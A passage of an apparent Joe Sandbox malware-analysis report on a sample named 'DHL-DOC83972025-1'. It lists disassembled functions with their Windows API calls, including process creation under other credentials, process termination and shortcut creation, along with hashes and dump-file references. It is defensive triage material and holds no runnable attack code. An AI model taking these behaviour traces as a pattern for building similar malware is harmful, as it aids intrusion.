Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 1cc1a4568052f4c208bee43d455b907e901115f020f51df6a1117830c511ea05
Instruction ID: b093d6a1650cd82936426c0423fb1539a14a16f411ccb3f275c0385d6fdf4942
Opcode Fuzzy Hash: 1cc1a4568052f4c208bee43d455b907e901115f020f51df6a1117830c511ea05
Instruction Fuzzy Hash: F4418871900205EBDF14EF55DC85AAB77B9FF44314F1040BAED00AA296DB34DE64CBA8

Function 004881DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0044F3AB,00000000,?,?,00000000,?,0044682C,00000004,00000000,00000000), ref: 0048824C
EnableWindow.USER32(00000000,00000000), ref: 00488272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 004882D1
ShowWindow.USER32(00000000,00000004), ref: 004882E5
EnableWindow.USER32(00000000,00000001), ref: 0048830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0048832F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: a344fde779955aef25b9a678d6aae9e90f6b53e3bdddc4ef86e083c3b2271037
Instruction ID: cab391f7d7bf73d3d06a9e4e50dbc70949ecb73988f5c3dcea59cd2729f35113
Opcode Fuzzy Hash: a344fde779955aef25b9a678d6aae9e90f6b53e3bdddc4ef86e083c3b2271037
Instruction Fuzzy Hash: 1841C474601644AFDB22EF15C895FAD7BE0BB06714F5805BEE9088B372CB36A841CB58

Function 00454C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00454C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00454CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00454CEA
_wcslen.LIBCMT ref: 00454D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00454D10
_wcsstr.LIBVCRUNTIME ref: 00454D1A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: a8c6713bdac19fcc163585bfc6a1c93004524a0b454ea8930d21f5e5e8ea7862
Instruction ID: 9b5f836ad33c864881fdf9b91b3317106ec9bde4f0f9aa1b79e3809d44870bee
Opcode Fuzzy Hash: a8c6713bdac19fcc163585bfc6a1c93004524a0b454ea8930d21f5e5e8ea7862
Instruction Fuzzy Hash: A621F8312041007BEB255B26DC45A7F7BA8DF85754F10403FFC05DE292EA79DC8992A4

Function 0046581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 003F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003F3A97,?,?,003F2E7F,?,?,?,00000000), ref: 003F3AC2

_wcslen.LIBCMT ref: 0046587B
CoInitialize.OLE32(00000000), ref: 00465995
CoCreateInstance.OLE32(0048FCF8,00000000,00000001,0048FB68,?), ref: 004659AE
CoUninitialize.OLE32 ref: 004659CC

Strings

.lnk, xrefs: 00465876, 004658C1, 00465985

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 6cea03213dfff2285cfc709a33a605c1c15df6ce1a96477dfe3d9de35ead391b
Instruction ID: 1f569d8d84d3528eca047b5256dbcc199f1f46dc9f07e21392d34acc3b63bdf3
Opcode Fuzzy Hash: 6cea03213dfff2285cfc709a33a605c1c15df6ce1a96477dfe3d9de35ead391b
Instruction Fuzzy Hash: D3D153B06047059FC714DF25C480A2ABBE1FF89714F14895EF88A9B361EB35EC49CB96

Function 0045175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00450FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00450FCA
Part of subcall function 00450FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00450FD6
Part of subcall function 00450FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00450FE5
Part of subcall function 00450FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00450FEC
Part of subcall function 00450FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00451002

GetLengthSid.ADVAPI32(?,00000000,00451335), ref: 004517AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004517BA
HeapAlloc.KERNEL32(00000000), ref: 004517C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 004517DA
GetProcessHeap.KERNEL32(00000000,00000000,00451335), ref: 004517EE
HeapFree.KERNEL32(00000000), ref: 004517F5

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 31b06a3cbd7f5c1ea33d375d3de1b34234bfdb2164265e00760b4262d5edf206
Instruction ID: d5b1bf2c16d756b9835e9a7c90508a9b7c58f16db20fba89aa9b79171214367d
Opcode Fuzzy Hash: 31b06a3cbd7f5c1ea33d375d3de1b34234bfdb2164265e00760b4262d5edf206
Instruction Fuzzy Hash: 77118431500205FFDB109FA8DCC9BAF77A9EB46356F10452DF84197221D7399948CB68

Function 004514CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004514FF
OpenProcessToken.ADVAPI32(00000000), ref: 00451506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00451515
CloseHandle.KERNEL32(00000004), ref: 00451520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0045154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00451563

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 3f73f4dc6129ffe21b88d03bb2487bf9a1a3c772d8e80104d90c3aa7caef7092
Instruction ID: 6352e36ece4a548060da9bededa830ea963f946618aed91fb83e8328f225f85f
Opcode Fuzzy Hash: 3f73f4dc6129ffe21b88d03bb2487bf9a1a3c772d8e80104d90c3aa7caef7092
Instruction Fuzzy Hash: E9118C7210020DABDF118F98DD89FDE3BA9EF49745F044029FE05A2160D3758E65EB65

Function 00413382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00413379,00412FE5), ref: 00413390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0041339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004133B7
SetLastError.KERNEL32(00000000,?,00413379,00412FE5), ref: 00413409

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7a249bd9aac38466baa3debe439dc7ed4e5fd33cd6487b28bc96c4afe2e99d2a
Instruction ID: f84962ed4c81748bb3fedc013a966b7bf523ee1d385cca25a2e32fce21532017
Opcode Fuzzy Hash: 7a249bd9aac38466baa3debe439dc7ed4e5fd33cd6487b28bc96c4afe2e99d2a
Instruction Fuzzy Hash: 69019E32709311ABAA253FB57CC56EB2A94EB0577B720033FF820852F1EF194D92565C

Function 00422D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00425686,00433CD6,?,00000000,?,00425B6A,?,?,?,?,?,0041E6D1,?,004B8A48), ref: 00422D78
_free.LIBCMT ref: 00422DAB
_free.LIBCMT ref: 00422DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0041E6D1,?,004B8A48,00000010,003F4F4A,?,?,00000000,00433CD6), ref: 00422DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0041E6D1,?,004B8A48,00000010,003F4F4A,?,?,00000000,00433CD6), ref: 00422DEC
_abort.LIBCMT ref: 00422DF2

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: eab66bdfc030f6dd3a27fa76a83ecab6cf8ea7131921e373235afc4d301d51e9
Instruction ID: 17afdb2d5ada70e8428e61248c23fc6ded1650e88ea7eeef4d3699cafd68ea83
Opcode Fuzzy Hash: eab66bdfc030f6dd3a27fa76a83ecab6cf8ea7131921e373235afc4d301d51e9
Instruction Fuzzy Hash: C6F0F93575453077C2522B3A7E46E5F1559AFC1765BA0052FF824922D2DFBC8802417C

Function 00488A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00409639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00409693
Part of subcall function 00409639: SelectObject.GDI32(?,00000000), ref: 004096A2
Part of subcall function 00409639: BeginPath.GDI32(?), ref: 004096B9
Part of subcall function 00409639: SelectObject.GDI32(?,00000000), ref: 004096E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00488A4E
LineTo.GDI32(?,00000003,00000000), ref: 00488A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00488A70
LineTo.GDI32(?,00000000,00000003), ref: 00488A80
EndPath.GDI32(?), ref: 00488A90
StrokePath.GDI32(?), ref: 00488AA0

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 7390b3c49dcf8b055916ba3cf8dcd984148a0dcae529bb44fe3148e0c59d40af
Instruction ID: afb1a8375d40acda1a75d697568ad6e627961b369819fbdd3ccccca546bc988e
Opcode Fuzzy Hash: 7390b3c49dcf8b055916ba3cf8dcd984148a0dcae529bb44fe3148e0c59d40af
Instruction Fuzzy Hash: 65110976400108FFDB129F90DC88EAE7F6DEB09394F008426BA199A1A1C7719D55DFA4

Function 004551FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00455218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00455229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00455230
ReleaseDC.USER32(00000000,00000000), ref: 00455238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00455261

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 3eb4fc8880fba15743b1fad68a41535b3940a998afa01a8b812bd74d25a05904
Instruction ID: 317e3ba14e41d5d56128b28b728f74f35f493501b22594faa8df60d53847d40f
Opcode Fuzzy Hash: 3eb4fc8880fba15743b1fad68a41535b3940a998afa01a8b812bd74d25a05904
Instruction Fuzzy Hash: 92014475A00714BBEB105BF59C89A5EBF78EF44751F04447AFA04E7281D6709805CFA4

Function 003F1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 003F1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 003F1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 003F1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 003F1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 003F1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 003F1C22

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 955b89a244ad8a0d98d23e33cc4b0276ed438343272a13ea9e30cfe56d55a3b3
Instruction ID: e64fb44cad9e3bee6c2abe41a45e626825a679d63d9fbb341b94087f606f6f5c
Opcode Fuzzy Hash: 955b89a244ad8a0d98d23e33cc4b0276ed438343272a13ea9e30cfe56d55a3b3
Instruction Fuzzy Hash: 7D016CB09027597DE3008F5A8C85B56FFA8FF19354F00411B915C47941C7F5A864CBE5

Function 0045EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0045EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0045EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0045EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0045EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0045EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0045EB75

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: c93f4a86f41cc9c69bf9713ee956745a97c8e57a90d6ed1042a230705593edd4
Instruction ID: c540b0c06c12fb4b0c5d2550e6153285f0e0a863d3e88dedfbaae63eaf373b5c
Opcode Fuzzy Hash: c93f4a86f41cc9c69bf9713ee956745a97c8e57a90d6ed1042a230705593edd4
Instruction Fuzzy Hash: C8F01D72540158BBE62157529C8DEAF3A7CEBCAB11F00056DFA01E1191E7B05A018BB9

Function 00447439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00447452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00447469
GetWindowDC.USER32(?), ref: 00447475
GetPixel.GDI32(00000000,?,?), ref: 00447484
ReleaseDC.USER32(?,00000000), ref: 00447496
GetSysColor.USER32(00000005), ref: 004474B0

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 8530eb0962a0aa702a64ebbd0eb0066cc47e9a84867e8d9fd2689a4894a5744f
Instruction ID: 948914efd47ae4ffc1c3a6e3e8cb207075136a5dde640de3c0884d74ed4f472a
Opcode Fuzzy Hash: 8530eb0962a0aa702a64ebbd0eb0066cc47e9a84867e8d9fd2689a4894a5744f
Instruction Fuzzy Hash: D3018B31400215FFEB515FA4EC48BAE7BB5FF04321F100879F915A21B1CB351E42AB69

Function 00451874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045187F
UnloadUserProfile.USERENV(?,?), ref: 0045188B
CloseHandle.KERNEL32(?), ref: 00451894
CloseHandle.KERNEL32(?), ref: 0045189C
GetProcessHeap.KERNEL32(00000000,?), ref: 004518A5
HeapFree.KERNEL32(00000000), ref: 004518AC

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: a8f10c9a03e7cf66ecb36c13b280e806dd35c9a267142dbcf619e6a8a60026dd
Instruction ID: 584eea221131b221d6cbc4d2dfcb706ee0dac568cab3e5ad9e22825e072f82e2
Opcode Fuzzy Hash: a8f10c9a03e7cf66ecb36c13b280e806dd35c9a267142dbcf619e6a8a60026dd
Instruction Fuzzy Hash: 46E0E536004101BBDB016FA1ED8CD0EBF39FF49B22B108A38F22581474CB329421EF68

Function 003FBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 003FBEB3

Strings

D%L, xrefs: 003FBE9A
D%LD%L, xrefs: 003FBCA5
D%L, xrefs: 003FBDED, 003FBD91, 003FBD1B
D%L, xrefs: 003FBCA2

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%L$D%L$D%L$D%LD%L
API String ID: 1385522511-3295220586
Opcode ID: 439f83a7d3914eede6197a9acd2658c1335732afc0bd1273881ca8232f3d6824
Instruction ID: 3b415746559d67da7ca13c1b774d6092dfb8eab9bb88adea9224e612642c2e92
Opcode Fuzzy Hash: 439f83a7d3914eede6197a9acd2658c1335732afc0bd1273881ca8232f3d6824
Instruction Fuzzy Hash: F1914AB5A0020ADFCB59CF58C190ABAF7F5FF58310B25816EEA45AB350D771E981CB90

Function 00477B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00410242: EnterCriticalSection.KERNEL32(004C070C,004C1884,?,?,0040198B,004C2518,?,?,?,003F12F9,00000000), ref: 0041024D
Part of subcall function 00410242: LeaveCriticalSection.KERNEL32(004C070C,?,0040198B,004C2518,?,?,?,003F12F9,00000000), ref: 0041028A

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

Part of subcall function 004100A3: __onexit.LIBCMT ref: 004100A9

__Init_thread_footer.LIBCMT ref: 00477BFB

Part of subcall function 004101F8: EnterCriticalSection.KERNEL32(004C070C,?,?,00408747,004C2514), ref: 00410202
Part of subcall function 004101F8: LeaveCriticalSection.KERNEL32(004C070C,?,00408747,004C2514), ref: 00410235

Strings

5, xrefs: 00477C78
+TD, xrefs: 00477E2E
G, xrefs: 00477C7F
Variable must be of type 'Object'., xrefs: 00477C3A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +TD$5$G$Variable must be of type 'Object'.
API String ID: 535116098-2061947132
Opcode ID: c69fd19af5fb6846d8a73471884dbb2870d76e45629fa81942c726ea4f054edf
Instruction ID: 51f77272207f5e95022d70ed6729936a409cf22c1552089f7fcc0ef5657b821f
Opcode Fuzzy Hash: c69fd19af5fb6846d8a73471884dbb2870d76e45629fa81942c726ea4f054edf
Instruction Fuzzy Hash: 92918C74A04209AFCB15EF55C9819FEB7B1AF48304F50805EF80A9B392DB799E41CB59

Function 0045C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003F7620: _wcslen.LIBCMT ref: 003F7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045C6EE
_wcslen.LIBCMT ref: 0045C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0045C7CA

Strings

0, xrefs: 0045C6AF

Memory Dump Source

